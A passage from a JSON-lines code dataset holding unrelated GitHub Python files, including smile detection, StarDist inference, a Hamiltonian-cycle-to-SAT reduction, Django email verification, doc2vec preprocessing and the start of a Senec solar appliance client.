ey), (ex + ew, ey + eh), (0, 255, 0), 1)\n\n smile = smile_cascade.detectMultiScale(face_area, scaleFactor=1.16, minNeighbors=50, minSize=(50, 50),\n flags=cv2.CASCADE_SCALE_IMAGE)\n # run the smile cascade classifier on the face region; smile is a list of smile coordinates\n for (ex, ey, ew, eh) in smile:\n # draw the smile box in green with line width 1\n cv2.rectangle(face_area, (ex, ey), (ex + ew, ey + eh), (0, 255, 0), 1)\n cv2.putText(img, 'Smile', (x, y - 7), 3, 1.2, (0, 0, 255), 2, cv2.LINE_AA)\n # 9 show the image\n cv2.imshow(\"test\", img)\n # 10 wait briefly; quit on 'q'\n if cv2.waitKey(5) & 0xFF == ord('q'):\n break\n#11 release the capture\ncapture.release()\n# #12 destroy all windows\ncv2.destroyAllWindows()","repo_name":"rainthousand/Old_Care_System_shentianyu","sub_path":"vision/smile/smileDetection.py","file_name":"smileDetection.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"33560105404","text":"import argparse\nimport os\nfrom glob import glob\nfrom concurrent import futures\nfrom pathlib import Path\n\n# don't parallelize internally\nn_threads = 1\nos.environ[\"OMP_NUM_THREADS\"] = str(n_threads)\nos.environ[\"OPENBLAS_NUM_THREADS\"] = str(n_threads)\nos.environ[\"MKL_NUM_THREADS\"] = str(n_threads)\nos.environ[\"VECLIB_NUM_THREADS\"] = str(n_threads)\nos.environ[\"NUMEXPR_NUM_THREADS\"] = str(n_threads)\n\nimport imageio\nfrom csbdeep.utils import normalize\nfrom stardist.models import StarDist2D\nfrom tqdm import tqdm\n\n\ndef apply_model(model, image_path, save_path, scale):\n if os.path.exists(save_path):\n return\n input_ = imageio.imread(image_path)\n input_ = normalize(input_.astype(\"float32\"), 1.0, 99.8)\n nuclei, _ = model.predict_instances(input_, scale=scale)\n assert nuclei.shape == input_.shape[:-1]\n imageio.imsave(save_path, nuclei)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input_folder\", \"-i\", 
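# normalize(input_, 1.0, 99.8) above is csbdeep's percentile normalization:
# intensities are rescaled so the 1st and 99.8th percentiles map to 0 and 1.
# A numpy sketch of the same idea:
import numpy as np

def percentile_normalize(x, pmin=1.0, pmax=99.8, eps=1e-8):
    lo, hi = np.percentile(x, pmin), np.percentile(x, pmax)
    return (x.astype("float32") - lo) / max(hi - lo, eps)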
required=True)\n parser.add_argument(\"--output_root\", \"-o\", required=True)\n parser.add_argument(\"--model_folder\", \"-m\", required=True)\n parser.add_argument(\"--n_threads\", \"-n\", default=16, type=int)\n parser.add_argument(\"--scale\", \"-s\", default=1, type=int)\n args = parser.parse_args()\n\n images = glob(os.path.join(args.input_folder, \"*png\"))\n print(\"Applying stardist model to\", len(images), \"images\")\n\n output_folder = os.path.join(args.output_root, os.path.basename(args.model_folder))\n os.makedirs(output_folder, exist_ok=True)\n\n def _predict(im):\n model_folder = Path(args.model_folder)\n model = StarDist2D(None, model_folder.name, model_folder.parent)\n name = os.path.basename(im).replace(\".png\", \".tif\")\n save_path = os.path.join(output_folder, name)\n apply_model(model, im, save_path, scale=args.scale)\n\n with futures.ThreadPoolExecutor(args.n_threads) as tp:\n list(tqdm(tp.map(_predict, images), total=len(images)))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"bioimage-io/use-cases","sub_path":"case1-stardist/bkp/run_stardist_batch.py","file_name":"run_stardist_batch.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"29230297413","text":"from hashtable import HashTable\n\ndef main():\n size = int(input())\n table = HashTable(size)\n while True:\n command = int(input())\n if command != 0 and command != 1:\n break\n text = input()\n if command == 0:\n table.insert(text)\n else:\n table.remove(text)\n print(table)\n\nif __name__ == '__main__':\n main()","repo_name":"oluiscabral/estrutura-de-dados","sub_path":"trab03/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72530915073","text":"#!/opts/anaconda3/envs/ENV/python\n\"\"\"\nA Bare minimum template for testing with a set up acab engine\n\"\"\"\nimport logging as logmod\nimport unittest\nfrom os import listdir\nfrom os.path import (abspath, exists, expanduser, isdir, isfile, join, split,\n splitext)\nfrom typing import (Any, Callable, ClassVar, Dict, Generic, Iterable, Iterator,\n List, Mapping, Match, MutableMapping, Optional, Sequence,\n Set, Tuple, TypeVar, Union, cast)\nfrom unittest import mock\nfrom unittest.mock import create_autospec\nfrom functools import partial\nimport timeit\n\nlogging = logmod.getLogger(__name__)\n\nimport acab\nimport warnings\nwith warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n config = acab.setup()\n\nfrom acab.modules.engines.basic_engine import AcabBasicEngine\nfrom acab.modules.parsing.exlo.exlo_dsl import EXLO_Parser\nfrom acab.modules.printing.default import DEFAULT_PRINTER\nfrom acab.modules.semantics.default import DEFAULT_SEMANTICS\n\ndef parse_file_runner(eng, f):\n eng.load_file(f)\n\n\nclass FileParsingTests(unittest.TestCase):\n\n\n @classmethod\n def setUpClass(cls):\n LOGLEVEL = logmod.WARNING\n LOG_FILE_NAME = \"log.{}\".format(splitext(split(__file__)[1])[0])\n cls.file_h = logmod.FileHandler(LOG_FILE_NAME, mode=\"w\")\n\n cls.file_h.setLevel(LOGLEVEL)\n logging = logmod.getLogger(__name__)\n logging.root.setLevel(logmod.NOTSET)\n logging.root.handlers[0].setLevel(logmod.WARNING)\n logging.root.addHandler(cls.file_h)\n\n cls.eng = AcabBasicEngine(parser=EXLO_Parser,\n semantics=DEFAULT_SEMANTICS(),\n printer=DEFAULT_PRINTER(),\n modules=[])\n\n @classmethod\n def tearDownClass(cls):\n 
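# run_stardist_batch above drives per-image prediction through a thread pool
# and wraps tp.map in tqdm for progress. The generic pattern in isolation:
from concurrent import futures

def run_parallel(fn, items, n_threads=16):
    with futures.ThreadPoolExecutor(n_threads) as tp:
        return list(tp.map(fn, items))

# results = run_parallel(lambda x: x * x, range(10))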
logmod.root.removeHandler(cls.file_h)\n\n def test_file_parsing_times(self):\n test_loc = join(split(__file__)[0], \"test_files\")\n test_files = [join(test_loc, x) for x in listdir(test_loc)\n if isfile(join(test_loc, x)) and splitext(x)[1] == \".trie\"]\n\n for file_name in test_files:\n with self.subTest(file_name=file_name):\n test_func = partial(parse_file_runner, self.eng, file_name)\n t = timeit.timeit(test_func, number=1)\n with open(file_name) as f:\n lines = len(f.readlines())\n\n logging.warning(\"Length: {}\", lines)\n logging.warning(\"Time : {:.4}\", t)\n","repo_name":"jgrey4296/acab","sub_path":"acab/__tests/test_file_parsing.py","file_name":"test_file_parsing.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"73970396995","text":"import torch\nimport numpy as np\nimport parse_args\nimport model.MINE as MINE\nimport model.RLB as RLB\nimport model.Logits_Loss as LL\nimport utils\n\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = True\n\nopt, model, optim, data = parse_args.collect_args()\n\n# train\nresult_last = []\nif opt['preprocessing'] == 'normal':\n if opt['model'] == 'MINE':\n mi, entropy, bias = MINE.train(data, model, optim, **opt)\n elif opt['model'] == 'RLB':\n mi, entropy, bias = RLB.train(data, model, optim, **opt)\n elif opt['model'] == 'LL':\n Logits_Loss = LL.train(data, model, optim, **opt)\n # print(Logits_Loss[-100:])\n result = (mi, entropy, bias)\n \nelif opt['preprocessing'] == 'indices':\n x_section = np.split(data, opt['indices'], axis=1)\n result_ma_indices_list = []\n for i in range(opt['indices']):\n print('indices number: {}'.format(i))\n x = x_section[i]\n mi, entropy, bias = MINE.train(data, model, optim, opt)\n result_ma_indices = MINE.ma(mi, opt['window_size'])\n result_last.append(result_ma_indices[-1])\n result_ma_indices_list.append(result_ma_indices)\n result_ma = np.mean(np.array(result_ma_indices_list), axis=0)\n\n# save result\nutils.save_result(opt, result)","repo_name":"jiazhi412/Representation-Level-Bias","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"74322925953","text":"import sys\n\nfrom itertools import combinations\nfrom collections import defaultdict\nimport operator\n\n\nclass Node(object):\n \"\"\"\n Representation of a computed value result of operate 2 previous elements\n \"\"\"\n\n def __init__(self, value, previous1=None, previous2=None, op=None, gen=0):\n self.p1 = previous1\n self.p2 = previous2\n self.op = op\n self.val = value \n self.gen = gen\n\n #Reprs as string of the class\n def __str__(self):\n return str(self.val)\n\n def __repr__(self):\n return str(self.val)\n\n #Comparator of the class\n def __eq__(self,obj):\n return self.val == obj.val\n\n #Create hash of class. 
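# The parsing benchmark above freezes the engine and file path into a no-arg
# callable with functools.partial so timeit can run it. The idiom on its own
# (parse here is a stand-in for eng.load_file):
import timeit
from functools import partial

def parse(engine, path):
    pass  # stand-in for engine.load_file(path)

# elapsed = timeit.timeit(partial(parse, "engine", "file.trie"), number=1)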
Used when checking for magic chains\n    def __hash__(self):\n        return hash(self.val)\n\n    #Follow the branch to recreate the operations required\n    def recreate(self):\n        if(self.gen > 0):\n            #Recreate the parents first\n            self.p1.recreate()\n            self.p2.recreate()\n            #Print the operation with parents to obtain this node value\n            print(self.op[3].format(self.p1.val,self.p2.val), \"=\", self.val)\n\n    \n#Now we define the set of operations following the syntax:\n#(operation, non-commutative, restriction (optional), repr)\noperations = [(operator.add, False, lambda x,y: True, \"{}+{}\"),\n              (operator.sub, True, lambda x,y: x > y, \"{}-{}\"),\n              (operator.mul, False, lambda x,y: True, \"{}*{}\"),\n              (operator.truediv, True, lambda x,y: x%y == 0, \"{}/{}\")]\n\n\ndef evolve(lst, gen):\n    # we assume that the Node values are unique\n\n    #When we have just one element we have finished\n    if (len(lst) == 1):\n        return lst\n\n    #We will operate with pairs since all our operations are binary\n    p = combinations(lst, 2)\n\n    #The results of combining the parent nodes will be stored in news\n    news = []\n    \n    for pair in list(p):\n        #Rewrite the list of elems. For each pair we remove the pair\n        #and insert the new elements.\n        newList = list(lst)\n        newList.remove(pair[0])\n        newList.remove(pair[1])\n\n        #At this point newList is unique for each pair\n\n        #For each operation we create a new node\n        for operation in operations:\n            aux = list(newList)\n            #We check if the pair satisfies the conditions of the operator\n            if operation[2](pair[0].val, pair[1].val):\n                n = Node( operation[0](pair[0].val, pair[1].val), pair[0], pair[1], operation, gen)\n                aux.append(n)\n                news.append(aux)\n\n            else:\n                pairN = (pair[1], pair[0])\n                #Since combinations doesn't yield both orderings, we swap the components\n                if operation[2](pairN[0].val, pairN[1].val):\n                    n = Node( operation[0](pairN[0].val, pairN[1].val), pairN[0], pairN[1], operation, gen)\n                    aux.append(n)\n                    news.append(aux)\n\n    return news\n\ndef evolution(origin):\n\n    #We create the first generation\n    genesis = evolve(origin, 1)\n    print(\"Working!\")\n\n    #And repeat the process until complete.\n    for i in range(2, 7):\n        next2 = []\n        for block in genesis:\n            for k in evolve(block,i):\n                next2.append(k)\n        genesis = next2\n\n    return genesis\n\ndef compose(n, base):\n    l = evolution(base)\n    #Check for the Nodes with the desired value\n    genes = list(filter(lambda x: x.val == n, l))\n    if(genes):\n        genes[0].recreate()\n    else:\n        print(\"No solution found\")\n\ndef is_magic(base):\n    groups = defaultdict(list)\n    print(\"Generated full list\")\n    #We create a hash table with unique keys. 
As we perform multiple\n    #queries, this speeds things up.\n    for obj in evolution(base):\n        groups[obj.val].append(obj)\n\n    for i in range(100,1000):\n        if i not in groups.keys():\n            return False\n\n    #print(\"Can generate \", i, \"✔\")\n    return True\n    \n    \n#Manage from console\nif __name__ == \"__main__\":\n\n    if(len(sys.argv) == 1):\n        print(\"Wrong number of arguments\")\n    \n    elif sys.argv[1] == \"compose\" and len(sys.argv) == 3:\n        compose(int(sys.argv[2]), base)\n\n    elif sys.argv[1] == \"is-magic\" and len(sys.argv) == 8:\n        newBase = []\n        for i in range(len(sys.argv) - 2):\n            newBase.append(Node(int(sys.argv[i+2])))\n\n        if is_magic(newBase):\n            print(\"It is a magic chain\")\n        else:\n            print(\"It is not a magic chain\")\n\n    elif sys.argv[1] == \"compose\" and len(sys.argv) == 9:\n        newBase = []\n        for i in range(len(sys.argv) - 3):\n            newBase.append(Node(int(sys.argv[i+3])))\n\n        compose(int(sys.argv[2]), newBase)\n    \n    else:\n        print(\"Unrecognized number of arguments\")\n","repo_name":"yabirgb/ED","sub_path":"retos/reto2/faster.py","file_name":"faster.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71490312193","text":"longest=\"\"\ndef ordered(s):\n\tl=len(s)\n\tfor inx in range(l-1):\n\t\tif s[inx]>s[inx+1]:\n\t\t\treturn False\n\treturn True\n\n# NOTE: s is normally predefined by the course grader; sample value so the script runs standalone\ns = 'azcbobobegghakl'\ninilen=len(s)\nif inilen==1:\n\tlongest=s\nelif inilen>1:\n\tsublen=inilen\n\twhile sublen>1:\n\t\toffset=inilen-sublen\n\t\twhile offset>=0:\n\t\t\tfor inx in range(offset+1):\n\t\t\t\tsub=s[inx:inx+sublen]\n\t\t\t\tif ordered(sub) and len(sub)>len(longest):\n\t\t\t\t\tlongest=sub \n\t\t\toffset-=1\n\t\tsublen-=1\n\nif not longest:\n\tlongest=s[0]\nprint((\"Longest substring in alphabetical order is: {}\").format(longest))","repo_name":"Devinwon/master","sub_path":"computer-science-and-python-programing-edX/sandbox/practice-problem-set1/problem3-alphabetical-substrings.py","file_name":"problem3-alphabetical-substrings.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30213704990","text":"# django\r\nfrom django.conf import settings\r\nfrom django.shortcuts import render\r\nfrom django.http import HttpResponseBadRequest\r\n# local\r\nfrom .exceptions import EmailVerificationTokenExpired, EmailVerificationTokenInvalid\r\nfrom .models import EmailVerificationToken\r\n\r\n\r\ndef client_email_verify(request):\r\n    user_token = request.GET.get(\"token\", None)\r\n    context = {\r\n        \"url\" : settings.HOSTING_URL,\r\n        \"token\" : user_token\r\n    }\r\n    if not user_token:\r\n        return render(request, 'api/verify_invalid_token.html', context)\r\n    try:\r\n        is_verified = EmailVerificationToken.objects.verify_client(user_token)\r\n    except EmailVerificationTokenExpired:\r\n        # The verification is expired\r\n        return render(request, 'api/verify_email_expired.html', context)\r\n    except EmailVerificationTokenInvalid:\r\n        # The token is invalid\r\n        return render(request, 'api/verify_invalid_token.html', context)\r\n\r\n    if is_verified:\r\n        # return verified\r\n        return render(request, 'api/verify_email_successful.html', context)\r\n    else:\r\n        return HttpResponseBadRequest()\r\n\r\ndef client_email_reset(request):\r\n    user_token = request.GET.get(\"token\", None)\r\n    context = {\r\n        \"url\": settings.HOSTING_URL,\r\n        \"token\": user_token\r\n    }\r\n    if not user_token:\r\n        return render(request, 'api/verify_invalid_token.html', context)\r\n\r\n    try:\r\n        
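# an invalid token raises EmailVerificationTokenInvalid from the manager\r\n        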
token = EmailVerificationToken.objects.reset_email_verification_token(user_token)\r\n except EmailVerificationTokenInvalid:\r\n # The token is invalid\r\n return render(request, 'api/verify_invalid_token.html', context)\r\n\r\n if not token.is_verified:\r\n token.send_verification_email()\r\n\r\n return render(request, 'api/verify_email_resend.html', context)\r\n","repo_name":"FengxiangZhao/Eculid_Rideshare","sub_path":"yida_project/euclid/euclid_verification/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22855979392","text":"import networkx as nx\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sat_to_3sat import *\n\n\nclass DHCtoSAT:\n\n def __init__(self, adjacency_list, directed=False, dimacs=False):\n\n self.formula = []\n\n if directed:\n self.graph_type = nx.DiGraph\n else:\n self.graph_type = nx.Graph\n\n self.G = nx.to_networkx_graph(adjacency_list, create_using=self.graph_type)\n\n self.literals = self.get_literals(adjacency_list)\n\n if dimacs:\n self.dimacs_dict = self.get_dimacs_dict(self.literals)\n else:\n self.dimacs_dict = None\n\n @staticmethod\n def get_literals(adj_list):\n return [(idx[0] + 1, idx[1] + 1) for idx, x in np.ndenumerate(adj_list) if x == 1]\n\n @staticmethod\n def get_dimacs_dict(literal_list):\n a = {x: i + 1 for i, x in enumerate(literal_list)}\n b = {(x[0] * -1, x[1] * -1): (i + 1) * -1 for i, x in enumerate(literal_list)}\n a.update(b)\n return a\n\n def add_to_formula(self, clause):\n self.formula.append(clause)\n\n @staticmethod\n def print_formula(G, formula, dimacs_dict=None):\n if dimacs_dict is not None:\n print('p cnf {} {}'.format(len(G.nodes()), len(formula)))\n for clause in formula:\n for i, literal in enumerate(clause):\n if i < len(clause) - 1:\n if dimacs_dict is not None:\n print('{}'.format(literal), end=' ')\n else:\n #print('{} V'.format(literal), end=' ')\n if literal[0] < 0:\n print('\\\\neg e_{' + str(literal[0]*-1) + ',' + str(literal[1]*-1) + '} \\\\vee', end=' ')\n else:\n print('e_{' + str(literal[0]) + ',' + str(literal[1]) + '} \\\\vee', end=' ')\n else:\n if dimacs_dict is not None:\n print('{} 0'.format(literal))\n else:\n # print('{}'.format(literal))\n if literal[0] < 0:\n print('\\\\neg e_{' + str(literal[0] * -1) + ',' + str(literal[1] * -1) + '} \\\\wedge')\n else:\n print('e_{' + str(literal[0]) + ',' + str(literal[1]) + '} \\\\wedge')\n\n\n def plot(self):\n nx.draw(self.G, with_labels=True, font_weight='bold')\n plt.show()\n\n def no_close_loop(self):\n for x in self.literals:\n for y in self.literals:\n if x[0] == y[1] and x[1] == y[0]:\n if self.dimacs_dict is not None:\n self.add_to_formula(\n [self.dimacs_dict[(x[0] * -1, x[1] * -1)], self.dimacs_dict[(y[0] * -1, y[1] * -1)]])\n else:\n self.add_to_formula([(x[0] * -1, x[1] * -1), (y[0] * -1, y[1] * -1)])\n\n def no_duplicate_head(self):\n for x in self.literals:\n for y in self.literals:\n if x[0] == y[0] and x[1] != y[1]:\n if self.dimacs_dict is not None:\n self.add_to_formula(\n [self.dimacs_dict[(x[0] * -1, x[1] * -1)], self.dimacs_dict[(y[0] * -1, y[1] * -1)]])\n else:\n self.add_to_formula([(x[0] * -1, x[1] * -1), (y[0] * -1, y[1] * -1)])\n\n def no_duplicate_tail(self):\n for x in self.literals:\n for y in self.literals:\n if x[0] != y[0] and x[1] == y[1]:\n if self.dimacs_dict is not None:\n self.add_to_formula(\n [self.dimacs_dict[(x[0] * -1, x[1] * -1)], self.dimacs_dict[(y[0] * -1, y[1] * -1)]])\n 
else:\n self.add_to_formula([(x[0] * -1, x[1] * -1), (y[0] * -1, y[1] * -1)])\n\n def one_outgoing_edge(self):\n for i, x in enumerate(self.literals):\n curr = []\n for y in self.literals:\n if i == y[0]:\n curr.append(y)\n if len(curr) == 1:\n if self.dimacs_dict is not None:\n self.add_to_formula([self.dimacs_dict[curr[0]]])\n else:\n self.add_to_formula(curr)\n else:\n if len(curr) != 0:\n if self.dimacs_dict is not None:\n for j, literal in enumerate(curr):\n curr[j] = self.dimacs_dict[literal]\n self.add_to_formula(curr)\n\n def convert(self):\n self.no_close_loop()\n self.no_duplicate_head()\n self.no_duplicate_tail()\n self.one_outgoing_edge()\n\n\na = np.array([\n [0, 1, 0, 0],\n [1, 0, 1, 1],\n [1, 0, 0, 1],\n [0, 0, 1, 0]\n])\n\nb = np.array([\n [1, 1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 0, 1, 1, 1],\n [1, 1, 1, 1, 0, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1, 1],\n])\n\nc = np.array([\n [0, 1, 0, 0, 1, 1],\n [1, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1],\n [0, 0, 1, 0, 1, 1],\n [0, 1, 0, 0, 1, 1],\n [0, 1, 0, 0, 1, 1]\n])\n\nd = np.array([\n [0, 1, 0, 1, 0, 1, 0],\n [0, 0, 1, 0, 0, 0, 0],\n [1, 0, 0, 1, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0],\n [1, 0, 0, 0, 0, 1, 0],\n [0, 0, 0, 0, 0, 0, 1],\n [1, 1, 0, 0, 0, 0, 0]\n])\n\ne = np.array([\n [0, 1, 0, 1, 0, 0, 0, 0, 0],\n [1, 0, 1, 0, 0, 0, 0, 0, 0],\n [0, 1, 0, 1, 0, 0, 0, 0, 0],\n [1, 0, 0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 1, 0, 1, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 1, 0, 1],\n [0, 0, 0, 0, 0, 1, 0, 1, 0],\n [0, 0, 0, 0, 0, 0, 1, 0, 1],\n [0, 0, 0, 0, 0, 1, 0, 1, 0]\n])\n\ndhc_to_sat = DHCtoSAT(e, directed=True, dimacs=True)\n#dhc_to_sat.plot()\nprint(dhc_to_sat.dimacs_dict)\ndhc_to_sat.convert()\ndhc_to_sat.print_formula(dhc_to_sat.G, dhc_to_sat.formula, dhc_to_sat.dimacs_dict)\nprint('--------------------')\n\nsat_to_3sat = SATto3SAT(dhc_to_sat.formula, dhc_to_sat.dimacs_dict)\nt_sat = sat_to_3sat.convert()\ndhc_to_sat.print_formula(dhc_to_sat.G, t_sat, sat_to_3sat.dimacs_dict)\n","repo_name":"mikepetersyn/dhcp_solving","sub_path":"dhc_to_sat.py","file_name":"dhc_to_sat.py","file_ext":"py","file_size_in_byte":6186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11728425738","text":"import nltk\nimport glob\nfrom nltk import tokenize\nimport gensim\nimport re\nimport numpy as np\nfrom collections import OrderedDict\nfrom nltk.stem.snowball import SnowballStemmer\nfrom nltk.corpus import stopwords\nimport random\n\ndef read_data(files_loc, s_type='positive'):\n content_list = []\n tag_list = []\n s_tag_list = []\n tokenizer = tokenize.RegexpTokenizer(r'\\w+')\n files_loc = files_loc + \"*.txt\"\n stemmer = SnowballStemmer(\"english\")\n\n for f in glob.glob(files_loc):\n tag_list.append(f)\n s_tag_list.append(s_type) \n\n with open(f, 'r', encoding='utf-8') as text:\n raw = text.read()\n content = re.sub(r'\\d+', '', raw)\n content = tokenizer.tokenize(content)\n content = list(map(lambda x: x.lower(), content))\n content = list(map(lambda x: stemmer.stem(x), content))\n content = [word for word in content if word not in stopwords.words('english')]\n content_list.append(content)\n\n\n return content_list, tag_list, s_tag_list\n\ndef word_count(content_list):\n print(\"word count start.....\\n\")\n word_count_dict = OrderedDict()\n \n for content in content_list:\n for word in content:\n if word in word_count_dict:\n word_count_dict[word] += 1\n else:\n word_count_dict[word] = 1\n\n 
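# sort words by descending frequency so index == frequency rank\n    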
word_count_dict = OrderedDict(sorted(word_count_dict.items(), key=lambda x: -x[1]))\n \n # Generate a word key list, the order of keys is based on the frequency of words from most to least\n word_key_list = list(word_count_dict.keys()) \n\n return word_count_dict, word_key_list\n\n\n# This is NOT doc2vec\ndef docvec_generate(content_list, word_key_list):\n print(\"docvec generation start......\\n\")\n docvec_list = []\n\n for content in content_list:\n docvec = []\n for word in content:\n if word not in word_key_list:\n continue\n else:\n docvec.append(word_key_list.index(word))\n docvec_list.append(docvec)\n\n # return list of docvecs of all documents \n return docvec_list\n\ndef c2i(x):\n if(x == 'positive'):\n return 1\n else:\n return 0\n\ndef preprocessing():\n \n training_reading_done = True #False\n doc2vec = True #True\n testing_reading_done = False\n first_reading_done = True\n\n # global item initialization\n word_key_list = []\n content_list = []\n tag_list = []\n s_tag_list = []\n word_count_dict = {}\n\n if(training_reading_done == False and first_reading_done == False):\n print('first reading start......')\n train_pos = \"task1/train/positive/\"\n train_neg = \"task1/train/negative/\" \n pos_content_list, pos_tag_list, pos_s_tag_list = read_data(train_pos, \"positive\")\n neg_content_list, neg_tag_list, neg_s_tag_list = read_data(train_neg, \"negative\")\n #content\n content_list = pos_content_list + neg_content_list\n #file path and name\n tag_list = pos_tag_list + neg_tag_list\n #sentiment tag\n s_tag_list = pos_s_tag_list + neg_s_tag_list\n s_tag_list = np.array(list(map(c2i, s_tag_list)))\n \n np.save(\"content_list\", content_list)\n np.save(\"s_tag_list\", s_tag_list)\n np.save(\"tag_list\", tag_list)\n\n if(doc2vec == False and training_reading_done == False):\n # Naive docvec\n word_count_dict, word_key_list = word_count(content_list)\n docvec_list = docvec_generate(content_list, word_key_list)\n\n print(\"Naive preprocessing done, saving......\\n\")\n docvec_list = np.array(docvec_list)\n np.save(\"naive_docvec_list\", docvec_list)\n \n\n elif(doc2vec == True and training_reading_done == False):\n # docvec from doc2vec model\n tag_list = np.load('tag_list.npy', allow_pickle=True)\n content_list = np.load('content_list.npy', allow_pickle=True)\n assert(len(content_list) == len(tag_list))\n TaggedDocument = gensim.models.doc2vec.TaggedDocument\n documents = [TaggedDocument(content_list[i], [tag_list[i]]) for i in range(len(content_list))]\n\n print(\"Doc2Vec model training start......\")\n model = gensim.models.Doc2Vec(vector_size=600,\\\n sample=1e-3, window=15, min_count=3, workers=4, epochs=10)\n\n model.build_vocab(documents)\n\n def perm(docs):\n random.shuffle(docs)\n return docs\n\n for i in range(10):\n print('Epoch: ' + str(i))\n model.train(perm(documents), total_examples=model.corpus_count, epochs=1)\n\n print(\"Doc2vec preprocessing done, saving......\\n\")\n model.save('model_v600_w15.model')\n\n docvec_list = []\n for filename in tag_list:\n docvec = model.docvecs[filename]\n docvec_list.append(docvec)\n docvec_list = np.array(docvec_list)\n np.save(\"doc2vec_docvec_list\", docvec_list)\n\n\n #Generate Doc2Vec testing docvec\n if(testing_reading_done == False):\n if(doc2vec == True):\n model_loc = 'model_v600_w15.model'\n model = gensim.models.Doc2Vec.load(model_loc)\n\n #test1\n test1_loc = 'task1/test/'\n content_list, tag_list, s_tag_list = read_data(test1_loc)\n np.save('doc2vec_testing1_tag', tag_list)\n testing_docvec_list = []\n\n for content in 
content_list:\n docvec = model.infer_vector(content)\n testing_docvec_list.append(docvec)\n \n testing_docvec_list = np.array(testing_docvec_list)\n np.save(\"doc2vec_testing1\", testing_docvec_list)\n\n #test2\n test2_loc = 'data2_task2/test/'\n content_list, tag_list, s_tag_list = read_data(test2_loc)\n np.save('doc2vec_testing2_tag', tag_list)\n testing_docvec_list = []\n\n for content in content_list:\n docvec = model.infer_vector(content)\n testing_docvec_list.append(docvec)\n \n testing_docvec_list = np.array(testing_docvec_list)\n np.save(\"doc2vec_testing2\", testing_docvec_list)\n\n #Generate naive testing docvec\n if(doc2vec == False):\n test1_loc = 'task1/test/'\n test2_loc = 'data2_task2/test/'\n\n #test1 part \n content_list, tag_list, s_tag_list = read_data(test1_loc)\n tag_list = np.array(tag_list)\n np.save('naive_testing1_tag', tag_list)\n docvec_list = docvec_generate(content_list, word_key_list)\n print(\"Testing 1 docvec finished, saving......\\n\")\n docvec_list = np.array(docvec_list)\n np.save('naive_testing1', docvec_list)\n print(len(docvec_list))\n \n #test2 part\n content_list, tag_list, s_tag_list = read_data(test2_loc)\n tag_list = np.array(tag_list)\n np.save('naive_testing2_tag', tag_list)\n docvec_list = docvec_generate(content_list, word_key_list)\n print(\"Testing 2 docvec finished, saving......\\n\")\n docvec_list = np.array(docvec_list)\n np.save('naive_testing2', docvec_list)\n print(len(docvec_list))\n\n\ndef testing_doc_read():\n test1_loc = 'task1/test/'\n test2_loc = 'data2_task2/test/'\n content_list, tag_list, s_tag_list = read_data(test1_loc)\n np.save('testing1_content_list', content_list)\n content_list, tag_list, s_tag_list = read_data(test2_loc)\n np.save('testing2_content_list', content_list)\n\n\n#preprocessing()\n#testing_doc_read()","repo_name":"froyohunter/Machine-Learning-Sentiment-Binary-Classification","sub_path":"submission_3/code/data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":7616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72998911233","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\nLibrary to get a lot of useful data out of Senec appliances.\r\n\r\nTested with: SENEC.Home V3 hybrid duo (https://senec.com/de/produkte/senec-home-v3-hybrid)\r\n\r\nKudos:\r\n* SYSTEM_STATE_NAME taken from https://github.com/mchwalisz/pysenec\r\n\r\nhttps://gist.github.com/smashnet/82ad0b9d7f0ba2e5098e6649ba08f88a\r\n\"\"\"\r\nimport requests\r\nimport struct\r\nimport json\r\nimport sys\r\n\r\n__author__ = \"Nicolas Inden\"\r\n__copyright__ = \"Copyright 2020, Nicolas Inden\"\r\n__credits__ = [\"Nicolas Inden\", \"Mikołaj Chwalisz\"]\r\n__license__ = \"Apache-2.0 License\"\r\n__version__ = \"1.0.0\"\r\n__maintainer__ = \"Nicolas Inden\"\r\n__email__ = \"nico@smashnet.de\"\r\n__status__ = \"Production\"\r\n\r\nclass Senec():\r\n\r\n def __init__(self, device_ip):\r\n self.device_ip = device_ip\r\n self.read_api = f\"http://{device_ip}/lala.cgi\"\r\n \r\n def get_values(self):\r\n response = requests.post(self.read_api, json=BASIC_REQUEST)\r\n if response.status_code == 200:\r\n res = self.__decode_data(response.json())\r\n return self.__substitute_system_state(res)\r\n else:\r\n return {\"msg\": f\"Status code {response.status_code}\"}\r\n\r\n def 